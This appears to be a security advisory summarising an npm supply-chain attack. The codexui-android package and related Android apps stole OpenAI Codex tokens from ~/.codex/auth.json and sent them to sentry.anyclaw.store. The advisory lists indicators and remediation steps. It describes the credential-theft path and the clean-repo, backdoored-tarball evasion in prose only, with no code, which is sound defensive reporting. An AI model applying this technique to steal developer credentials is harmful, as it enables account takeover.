Aikido — OpenAI Codex Token Theft via codexui-android npm Package
AI relevance: This supply-chain attack targets AI developer tooling directly — stealing persistent Codex OAuth tokens that grant long-term access to an AI coding agent's full capabilities, and distributing the malicious package through AI-themed Android apps on Google Play.
What happened
- Aikido Security researcher Charlie Eriksen discovered the
codexui-androidnpm package (29,000+ weekly downloads) silently exfiltrating OpenAI Codex authentication tokens tosentry.anyclaw.store. - The package is a legitimate-looking remote web UI for Codex; malicious code was added roughly a month after initial publication, building trust before flipping.
- It reads
~/.codex/auth.json(plaintext cached credentials) and sends the access_token, refresh_token, id_token, and account ID to the attacker's server. - The refresh_token has no expiry — stolen tokens allow indefinite impersonation of the victim's Codex account.
- The GitHub repo appears clean; the backdoor exists only in the published npm tarball, a known supply-chain evasion technique.
- The same exfiltration chain ships inside at least two Google Play apps under "BrutalStrike" (50,000+ and 10,000+ downloads), using PRoot to run the npm package in a sandboxed Linux environment.
- The package author (account "friuns", aka Igor Levochkin) initially claimed to have lost npm access, then pivoted to "investigating internally."
- The WHOIS for
anyclaw.storetraces back to the same individual's X profile.
Why it matters
- Codex tokens provide persistent access to AI coding agents that can read, write, and execute code on behalf of the victim — a stolen token is equivalent to handing an attacker a full developer identity.
- This demonstrates that AI developer tools are becoming primary targets for supply-chain attacks, not just collateral.
- Google Play distribution through AI-themed apps creates a dual-vector attack: developers get infected from both npm and mobile app stores simultaneously.
- The "clean GitHub, malicious npm" pattern shows that source-audit alone won't catch this class of attack.
What to do
- If you have
codexui-androidinstalled: uninstall it immediately, rotate all Codex tokens, and check~/.codex/auth.jsonfor exposure. - Check for the Android apps "OpenClaw Codex Claude AI Agent" (gptos.intelligence.assistant) and "Codex" (codex.app) — uninstall if present.
- Prefer API-key-based auth over file-based token storage where possible; treat
~/.codex/auth.jsonas a password file. - Audit installed npm packages for unexpected postinstall/preinstall scripts.
- Monitor for network connections to
sentry.anyclaw.storein your environments.